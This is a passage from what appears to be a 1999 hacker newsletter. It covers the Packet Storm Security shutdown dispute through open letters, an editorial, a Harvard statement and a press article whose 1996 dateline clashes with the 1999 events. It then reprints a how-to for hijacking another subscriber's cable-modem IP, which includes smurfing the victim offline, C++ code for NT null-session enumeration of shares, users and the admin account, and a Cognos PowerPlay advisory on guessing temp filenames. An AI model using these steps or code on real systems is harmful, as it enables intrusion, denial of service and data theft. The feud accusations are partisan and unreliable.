actually compromised. For the record, Jeff Gray, the Harvard senior sysadmin, has been extremely supportive of my site and work from the beginning, and he deserves ALOT of credit for going out of his way to help keep Packet Storm Security alive and online. In fact, Jeff Gray has provided so much support for "the security community" in general, and is so supportive of security-related research and projects, that he deserves all the credit in the world for his efforts. I hope Harvard gives him the credit he is due, because any network security they have is in large part due to his skills, devotion, and diligence. If that's not enough to annoy me, all of my class work for the class I'm taking at NCSU this summer (CSC499 Independent Research project involving IDS) is/was on that server at Harvard and gone now too. With 4 weeks left in the semester here at NCSU, I have just lost seven weeks of work and data that cannot be replaced in 4 weeks. What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good. The site was getting over 400,000 hits/day and doing about 10 GB/day in transfers, so I don't see it coming back online even if I do get any of the site content back. Obviously, I have taken full responsibility for the site content and all activities and events associated with that server. Even though no laws or rules were broken, on my part, and to my knowledge, I am now facing possible legal action from both JP and Harvard, and state/federal computer crime charges as well. What am I going to do now? I don't know. The web site I devoted most of my waking hours to is gone. My chances of passing my CSC499 class do not look good, according to the negative comments from my professor. I'll try to salvage the summer's worth of course work anyway if possible and pass. Until formal charges are filed, I've still got my job and account here at NCSU. When NCSU catches wind of this, and I'm sure they will, my account probably will be permanently revoked, and my job and the past three years of school will then be gone too. Until then, I can be contacted at the email address in the sig below. Check out the news and history of John Vranesevich and Carolyn Meinel's smear and harassment campaigns that have ruined the careers and lives of many people, mine included. www.attrition.org has all of the details. Funny how I spent the past few years donating my time, literally thousands and thousands of hours, to "the security community", never asking for or making a single penny off the time and work I invested, and have now lost it all because John Vranesevich and a few of his IRC friends are able to make quick phone calls, fabricate absurd stories about criminal activity, libel, threaten to sue Harvard, and I don't even get to plead my case. I am guilty without even being informed of what was going on. He has effectively ruined years of my work, my education, my career, my life. There are really only four things that I'd like right now: 1. Justice 2. Truth 3. The 3 GB of MY data that Harvard has and refuses to turn over to me 4. A job in the IT/IS/IW industries - the pay doesn't even matter, I'm willing to move, I'm willing to put in 60-80 hour weeks. Just give me a UNIX or Linux box to work from. I'll settle for just the job though, and like I said, the pay doesn't matter - I love computers, network security, and systems administration. If I was not doing it for pay, I'd be doing it for free. See you at BlackHat and DEFCON. take it easy, Ken Williams jkwilli2@unity.ncsu.edu if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu and CC the email to packetstorm@genocide2600.com with phone # request. my pgp keys are available on all of the regular keyservers, and at www4.ncsu.edu/~jkwilli2/ [Note: yes, you can quote or print any part of or the whole email.] Ken Williams ken@packetstorm.harvard.edu Packet Storm Security http://packetstorm.harvard.edu -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQEVAwUBN3sH3pDw1ZsNz1IXAQE67QgAt5O4cgV4UN/tNro0V9Hkrz4YJGuysf2F aZdUuM+P73MwwlvjKFpLW5WOJwtZzFjicv6RYMlXaMLRL48Fz/rltX95dy71LCOs /UVa9LXvh7kSgD5p/pSeP2+zyDuvbvUxjtSTIPRp68sOQTKILaQpohwl9hzpfVLz ADvQMD5vAUqGlTeoQrZRmHC/OxtWqVEgh72Gms4XpGaGwT3OdtoRKuK0d4Js3mP9 Vs1szlsT3DQEFvdblLR/jsf8jonbME/Imo89K69wFsbyeVpIB1+g0Se11BdQCbeU TdauQTJMfDTkIWSQvpQXXIhvukErb8D9bmFvKiE7MqS+N8RVaMO7Zw== =7OhX -----END PGP SIGNATURE----- *************************************************************************** -=- Net Thug Shuts Down Largest Free Security Site Wed Jun 30 16:36:10 MDT 1999 ATTRITION Staff Earlier today, the PacketStorm Security site was abruptly shut down with no warning. PacketStorm (packetstorm.harvard.edu) was one of the largest and most respected sites catering to security professionals worldwide. Boasting an average of 400,000 hits a day, pushing out roughly 10 gigs of traffic, the site was a valuable resource to an estimated 10,000 security professionals world wide. The security resource did not suffer at the hands of hackers or network intruders. Instead, a new kind of malicious criminal found success through a fear that haunts more and more Americans today. A single piece of email from John Vranesevich (founder of AntiOnline) to the educational institution hosting Packetstorm threatened a lawsuit if the site was not shut down. Harvard said there were "numerous" complaints, but provided no additional details. Like most US institutions, the idea of being dragged to court for any reason is enough to scare them into hasty action. With that mail, Harvard pulled the plug. This decision was no doubt made as an easy alternative to spending time and resources fighting the claims. Email from Ken Williams, primary administrator for the site, to Attrition staff indicated that not only did Harvard shut down the site, they denied him access to the machine and all information stored on it. The correspondance noted the likelihood that all information on the machine, and all backups would be destroyed in order to avoid the AntiOnline lawsuit. "All of the content and the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it." said PacketStorm founder Ken Williams. Williams went on to say that he does not fear any fraudulent lawsuit Vranesevich could attempt to level at him. The information contained on the site regarding Vranesevich was not in violation of any US law that he was aware of, and had been there for over a year. Along with the security site, months of William's own school work was lost. "I have just lost seven weeks of [class] work and data that cannot be replaced in 4 weeks." Williams said, referring to deadlines on the school work. "What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good." - Ken Williams, PacketStorm founder These vague and unfounded legal threats only serve to hurt the security community. AntiOnline's mission statement claims they exist "to educate the public on computer security related issues." Apparently, this mission statement forgot to include such things like "educate the public through OUR site only" and "as long as we profit from it". *************************************************************************** JP has since offered this news: http://www.antionline.com/archives/editorials/packetstorm.html ( Likely suffering major DoS attacks in result of their actions I was unable to get thru to the site to read their shit for posting here...they will burn in hell for this action - Ed ) Ok I cut thru the cruft, here's JP's 'story'; PacketStorm Is Shut Down An AntiOnline Editorial Thursday , July 01 1999 Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP. On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company. While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own. Below is a copy of that letter: Greetings: May I first say that I did my best to see that this letter got sent to the appropriate individuals. I had some difficulty determining who those individuals may be, so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s). My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA. Earlier today, one of my colleagues forwarded me the following URL: http://packetstorm.harvard.edu/jp/ Needless to say, I was shocked and outraged at what I saw. This page contains a large archive of libelous and, to put it bluntly, sick material. Everything from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people engaged in homosexual activities, to a nun that appears to be covered in seminal fluid. I am astounded that an institution as prestigious Harvard would be party to the dissemination of this type of material. It is my hope that the University Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly. I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear violation of that policy. It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded. I hope to hear from you soon about this matter, and what you may have done regarding it. Yours In CyberSpace, John Vranesevich Founder, AntiOnline Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part: Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life. Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not loose your site because of me, you lost it because of you. I could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you, and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best of success in all that you do. Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However, I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious hackers. People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous. Yours In CyberSpace, John Vranesevich Founder, AntiOnline -=- *************************************************************************** Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/ " Support for Ken Williams Continues to Grow contributed by Space Rogue The outpouring of support for Ken Williams and Packet Storm Security has been phenomenal. One such item of support has been the beginning of an effort to rebuild PSS from scratch as a grassroots effort. The organizer of this is asking anyone who ever downloaded a file form PSS to upload it here. PacketStorm Mirror http://packetstorm.nl.linux.org/ *************************************************************************** Statement from Harvard: ======================= * S T A T E M E N T * As a service to the Internet community, Harvard agreed to host a Packet Storm Security Website for security-related materials only. Without Harvard's knowledge, unrelated content was put on the Harvard server, including sexually-related material and personal attacks on an individual not affiliated with the University. A Harvard administrative site focused on security issues is not the forum for this type of material. We are returning the content on the site and hope that Packet Storm will make its security tools available through its own Website. Joe Wrinn Director Office of News and Public Affairs Joe Wrinn Director, Harvard News Office 1350 Massachusetts Ave., Rm. 1060 Cambridge, MA 02138 *************************************************************************** Ken's Rebuttal to the Harvard statement; Date: 7/1/99 17:58 Received: 7/1/99 18:01 From: Ken Williams, jkwilli2@unity.ncsu.edu Hi, [The Harvard] statement is incorrect, and even libelous itself by implying that I had "sexually related materal" on the server. I NEVER did! NOW, I will retain legal counsel. This is outrageous! I wouldn't have been surprised to find myself slandered by John Vranesevich and AntiOnline, but to have Harvard implicitly state that I was serving up "sexually related material" to the Internet is absurd, libelous, and legally reprehensible. Are you, Harvard, trying to ruin my reputation and career now too? It sounds to me like you are fabricating this "sexually related material and personal attacks" statement to appease your critics, and, as I (now ominously) mentioned in my first open letter, trying to use me as the fall guy. Regretfully, Ken Williams *************************************************************************** ZDNet; ZDNN: Harvard caught in hacker crossfire Tue, 01 April 1996 18:29:02 GMT Harvard University is caught in the middle of an online war between hacking-scene follower AntiOnline.com and the hacking community at large. On Wednesday, the Cambridge, Mass., university removed an independent security Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days. The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that had "sexually related material and personal attacks on an individual not affiliated with the University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement released by Harvard on Thursday. "We agreed to have a site that had security-related materials only," said Wrinn. "Both parties involved were using us in a way that was completely inappropriate." Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily refuted the allegations. "This statement is incorrect, and even libelous itself by implying that I had 'sexually related material' on the server," he wrote in an e-mail. "I never did!" According to Williams, the directory -- labeled "/jp" because it was a collection of material satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. But others familiar with the site said that the parody also contained photos of nude women that were intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did not know specifically what sort of "sexual" content was contained on the site. Harvard in the hot seat "We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete contents of the site back to Williams so that he can post it elsewhere. No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers and security experts to get up-to-date security information. "Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of the Webmasters at hacker news and information site Attrition.org. "It was updated daily with tools. It was always there." Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of Investigation, claimed Webmaster Williams. 'I didn't have an anti-J.P. Temple of Hate' Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly -- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and webmaster of The Happy Hacker. "I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, organizations, and individuals out there that ;we believe; are black-eyes of the industry." So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of AntiOnline's founder. The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the most part, AntiOnline and its main foe, Attrition.org, have squared off with conflicting allegations of slander, libel and plagiarism. ' I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit.' "I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source already online, the Packet Storm Webmaster thought the pictures were fair game. Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost -- and Harvard quickly took the site down. Did Harvard act too quickly? B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly. "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit," he said. yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week -- defaced another government Web site with the news. "Now, because of; JP ... Packetstorm is no more, and never will be again," the site http://www.aao.uc.usbr.gov/ lamented. Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- which floods a particular site with random data -- so severe that its Internet service provider pulled the site for almost 12 hours on Thursday, said Vranesevich. Ugly threats Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have in five years," he said. Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down. "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone." In his mind, the contents of "/jp" did. @HWA 03.0 Cable Modem Hijacking from www.hackcanada.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Cable Modem IP Hijacking in Win95/98 The purpose of this is to show you how bad cable modems security is and that even with a win box you can take someone else's IP. You can hijack IP's using a cable modem and it's very simple in any operating system. Just follow the steps: 1) Choose someone's IP that you wish to have. Make sure the IP is on the same network. Most cable modem providers use DHCP. The fist thing you have to do is find the victims IP. Remember the victims IP has to be in the same network and with the same service provider for this to work. 2) Now this is probably the hardest thing in this file (but it's still easy), you have to wait until the victims computer is off or you can Smurf kill his connection. When you think his computer is off-line just try to ping it to see if you get a response. Do this by going to a DOS prompt and typing ping (victims IP). If you get a response then you have to try harder. After you get his PC off-line then you go into your network properties and edit the IP settings, but instead of having yours there you put the victims IP, host, and domain. 3) Restart. If you restart and you get an IP conflict this means that the victims computer is on, if you don't get an IP conflict then try to go to your web browser and see if it works. With some cable modem providers you might have to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS search, and Domain. Now you can go. Everything will work until the victims PC is back on. Once it is back online it will take the IP away because it will tell you that you have the wrong Mac addresses. *Linux* This is also possible in Linux, but is not the best way. You can change your Mac address to the victims PC and this is more secure and much easier. There are a couple of scripts to change your address, just look around. Warning: Some cable modem service providers will know when you're using the wrong IP, but hey, it might be useful. Copyright (c) 1999 Wildman www.hackcanada.com @HWA 04.0 Exploiting Null Session Weaknesses in NT environment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Details About NULL Sessions This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to better understand the NT environment and recognize code that might be used against them. The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information. The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which they weren't authenticated, but that the authenticated group had permissions for. Originally, 'everyone' did not mean 'anyone'. You still had to log on to be in the everyone group. however, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean 'anyone' - until someone finds an exploit. The following code segments are commented to show exactly what is happening, what API's are being used, and how the true administrator name can be identified. First - making a NULL Session connection One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this.... //This function called from dialog that fills listbox with connections BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg) { //Setup for UNICODE char* pTemp = TargetHost.GetBuffer(256); WCHAR wszServ[256]; LPWSTR Server = NULL; //Convert to Unicode MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1, wszServ, sizeof(wszServ)/sizeof(wszServ[0]) ); //Create the IPC$ share connection string we need Server = wszServ; LPCWSTR szIpc = L"\\IPC$"; WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL DWORD dwServNameLen; DWORD dwRC; //Setup Win32 structures and variables we need NET_API_STATUS nas; USE_INFO_2 ui2; SHARE_INFO_1* pSHInfo1 = NULL; DWORD dwEntriesRead; DWORD dwTotalEntries; //Set up handles to tree control to insert connection results HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot; char sharename[256]; char remark[256]; if(Server == NULL || *Server == L'\0') { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } dwServNameLen = lstrlenW( Server ); //Test for various errors in connection string and recover if(Server[0] != L'\\' && Server[1] != L'\\') { // prepend slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } if(lstrcatW(RemoteResource, Server) == NULL) return FALSE; if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE; //Start with clean memory ZeroMemory(&ui2, sizeof(ui2)); //Fill in the Win32 network structure we need to use connect API ui2.ui2_local = NULL; ui2.ui2_remote = (LPTSTR) RemoteResource; ui2.ui2_asg_type = USE_IPC; ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL ui2.ui2_username = (LPTSTR) L""; ui2.ui2_domainname = (LPTSTR) L""; //MAKE THE NULL SESSION CALL nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT); } //THIS IS WHERE NT HANDS OUT IT INFORMATION nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { if(dwTotalEntries > 0) { shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST); userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST); adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST); } for(int x=0; x<(int)dwTotalEntries; x++) { // Convert back to ANSI WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1, sharename, 256, NULL, NULL ); WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1, remark, 256, NULL, NULL ); CString ShareDetails = sharename; ShareDetails = ShareDetails + " - " + remark; //fill the tree with connect info attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST); pSHInfo1++; } } //My Wrapper function for listing users - see below DoNetUserEnum(Server, pDlg, userRoot, adminRoot); //WE ARE DONE, SO KILL THE CONNECTION nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0); TargetHost.ReleaseBuffer(); SetLastError( nas ); return FALSE; } The following function is how one can programmatically determine the administrator status of an account...... bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID for user int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; //Call API for buffer size since we don't know size beforehand rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); //Allocate a larger buffer if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); //Repeat call now that we have the right size buffer rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } //Scan the SIDS for the golden key - ADMIN == 500 //Get a count of SID's iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); //Admin SID is the last element in the count dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN { Name.Format("Admin is %s\\%s\n", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE } Wrapper for Listing the user accounts..... void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'\\' && pServer[1] != L'\\') { //Start sting with correct UNC slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; //THIS IS THE API THE NT USES TO HAND OUT IT's LIST dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { //use char strings CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin) { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); } Send mail to info@ntobjectives.com with questions or comments about this document. Copyright © 1999 NT OBJECTives, Inc. All Rights Reserved. All trademarks are the property of their respective owners. Last modified: June 28, 1999 @HWA 05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Date: Mon, 28 Jun 1999 07:29:37 -0400 From: Darin White To: BUGTRAQ@netspace.org Subject: Cognos PowerPlay Web Edition security WEB SECURITY ADVISORY ------------- Release Date: 1999-06-25 Application: Cognos PowerPlay Web Edition Severity: Unauthenticated web users can sniff cube data Author: Darin White Operating Sys: Microsoft NT Server -------------- I. Description Due to design problems as well as some potential web server misconfiguration PowerPlay Web Edition may serve up data cubes in a non-secure manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. Those files are then fed back to frames in the browser. In some cases it is trivial for an unauthenticated user to tap into those data files before they are purged. Cognos has been contacted but does not regard this as a serious exposure (see appendix B below). The issues are: (a) dynamic directory listing (b) weak temporary filename algorithm (c) ad hoc parameters to the CGI II. Details Identifying PowerPlay sites is quickly accomplished using AltaVista http://www.altavista.com/cgi-bin/query? pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search (join last two lines) which hits all pages containing a link to the PowerPlay CGI ppdscgi.exe on NT. Normal authentication for protected cubes occurs when a user selects a link like: Example At this point the user is prompted for a userid and password. Beyond this check there seems to be no verification that data is being fed out to the browser that requested it and was authorized. (a) dynamic directory listing Netscape Enterprise Server 3.5.1 appears to be serving up dynamic directory listings by default. A known PowerPlay site can be hit with a request for http://www.example.com/ppwb/Temp/ which will return something like: /ppwb/Temp/ - 6/25/99 9:17 AM 17904 1ad6t.htm 6/25/99 9:17 AM 37828 1ad6x.htm Here we see two temporary files created by one initial cube request. The suffix 't' in the first filename denotes the PowerPlay toolbar and 'x' denotes the data content. These files are fed back to the browser to populate two frames. Clicking on the content filename will allow any user to browse the current cube view with no authentication challenge even if the cube has been password-protected. Once into the cube the user may continue to drill for further data. (b) weak temporary filename algorithm Sites that have disabled directory listing may still be vulnerable. Many sites using PowerPlay offer a mix of protected and unprotected cubes. Some sites also offer an anonymous user account (let's say "guest" for example). The PowerPlay CGI uses a common temporary directory for serving all cubes back to the browser. Using the guest account or viewing an unprotected cube a user may right-click the content area and select View Frame Info which will display the temporary filename. By repeatedly reloading the initial cube view and viewing frame info a list of temporary filenames may be generated in order to analyze the filename algorithm. e.g. http://www.example.com/ppwb/Temp/1eeex.htm http://www.example.com/ppwb/Temp/1f77x.htm http://www.example.com/ppwb/Temp/1fcfx.htm http://www.example.com/ppwb/Temp/1ff6x.htm http://www.example.com/ppwb/Temp/2014x.htm Analysis of the filename progression shows: * the last char is 'x' for the data and 't' for the toolbar * first n-1 chars are hexadecimal chars only * the hexadecimal "numbers" comprising the filename are ascending only * the first char is never 0. e.g. fffx.htm => 1000x.htm * simple hexadecimal subtraction on the first n-1 chars of consecutive filenames shows a very predictable pattern (see appendix A) A user may orient themselves in the namespace (the set of all possible filenames) by using a guest account or unprotected cube. Once oriented a set of candidate filenames may be generated and requested from /ppwb/Temp on the server. Of course this approach assumes valid users are hitting the cubes at the same time. Once a successful hit has been made on a temporary file the user may drill further into the data as described in (a) above. Alternatively a brute force attack on a server could be attempted by just submitting requests for all possible filenames. Of course if you could establish some idea of how long the site has been operational you might start with 4-char filenames. A very new site with low traffic (if the owner displays a page counter) might be best approached with 3-char names. This type of attack would present a beat-the-clock situation as the ~65000 requests (for 4-char) scanned for an existing file before it was purged from the Temp directory. (c) ad hoc parameters to the CGI A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe provide additional information on the PowerPlay server. * ?ABOUT= will return the version of PowerPlay. * ?TOC (or no parameter) presents a table of contents list of all web-enabled cubes on the server. Some sites are using static page links to hit cubes rather than relying on PowerPlay's generated TOC. They may not be aware that all cubes are available. * the hidden parm PPWB in the data contents frame details the unaliased location of the temporary directory. e.g. INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb"> III. Solution (a) dynamic directory listing Turn this feature off on you web server following the directions provided by the server vendor. If you are unable to disable this feature you may create an index.html file in the /ppwb/Temp directory that will load when a filename has not been specified in the URL. (b) weak temporary filename algorithm This is really on Cognos' plate. Watch your error logfile for a lot of failed requests for /ppwb/Temp/*.htm to at least detect an attack. Removing anonymous cube access may slow an attack. (c) ad hoc parameters to the CGI Just be aware of what is available by altering the parameters. Don't assume your cubes are hidden because there is no direct link to the table of contents from the web. Password protect your cubes. DW APPENDIX A Here's the output of one subtraction run which shows the v6.5 temporary filenames and then the hex delta between adjacent filenames: Processing test.dat ... 2161x.htm 216bx.htm Ax 2188x.htm 1Dx 2192x.htm Ax 219cx.htm Ax 21a6x.htm Ax 21afx.htm 9x 21b9x.htm Ax 21c3x.htm Ax 21cdx.htm Ax 21d7x.htm Ax 21e0x.htm 9x 21eax.htm Ax 21f4x.htm Ax 21fex.htm Ax 2207x.htm 9x 2211x.htm Ax 221bx.htm Ax 2225x.htm Ax 222fx.htm Ax 2238x.htm 9x 2242x.htm Ax 224cx.htm Ax 2256x.htm Ax 2260x.htm Ax 2269x.htm 9x 2273x.htm Ax 227dx.htm Ax 2287x.htm Ax 2291x.htm Ax 229ax.htm 9x SUMMARY diff count A : 23 1D : 1 9 : 6 out of 31 filenames Here are some other summaries: SUMMARY diff count 203B : 1 DF : 1 13 : 4 A : 10 14 : 3 27 : 1 9 : 1 out of 22 filenames SUMMARY diff count 3E : 1 A : 19 9 : 5 out of 26 filenames Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed: 25bx.htm 25cx.htm 1x 25dx.htm 1x 25ex.htm 1x 25fx.htm 1x 260x.htm 1x 261x.htm 1x 262x.htm 1x 263x.htm 1x 264x.htm 1x 265x.htm 1x 266x.htm 1x 267x.htm 1x 268x.htm 1x 269x.htm 1x 26ax.htm 1x 26bx.htm 1x 26cx.htm 1x SUMMARY diff count 1 : 17 out of 18 filenames SUMMARY diff count 37E : 1 1 : 491 out of 493 filenames SUMMARY diff count 1E7 : 1 1 : 295 out of 297 filenames SUMMARY diff count 1 : 1255 out of 1256 filenames APPENDIX B 1999-06-10 analysis submitted to Cognos 1999-06-11 submission acknowledged 1999-06-18 response from Cognos (below) ----------------------------- Hello Darin, Thank you for the descriptive analysis of your problem. I understand that you have set up anonymous access and therefore you are aware of the security risk. I agree that the temp file generation is predictable and would suggest logging an enhancement through our web site. In the interim you have to weigh what is acceptable in terms of security knowing that there are other alternatives such as SSL and LDAP. These other options will of course offer substantially more protection. In conclusion your analysis is correct, now it is a factor of weighing your security wants and needs. Regards, Michael Bockholt Cognos Support Specialist Tel: 1-800-637-7447 email: support@cognos.com ----------------------------- -------------------------------------------------------------------- Darin White d.w@ibm.net 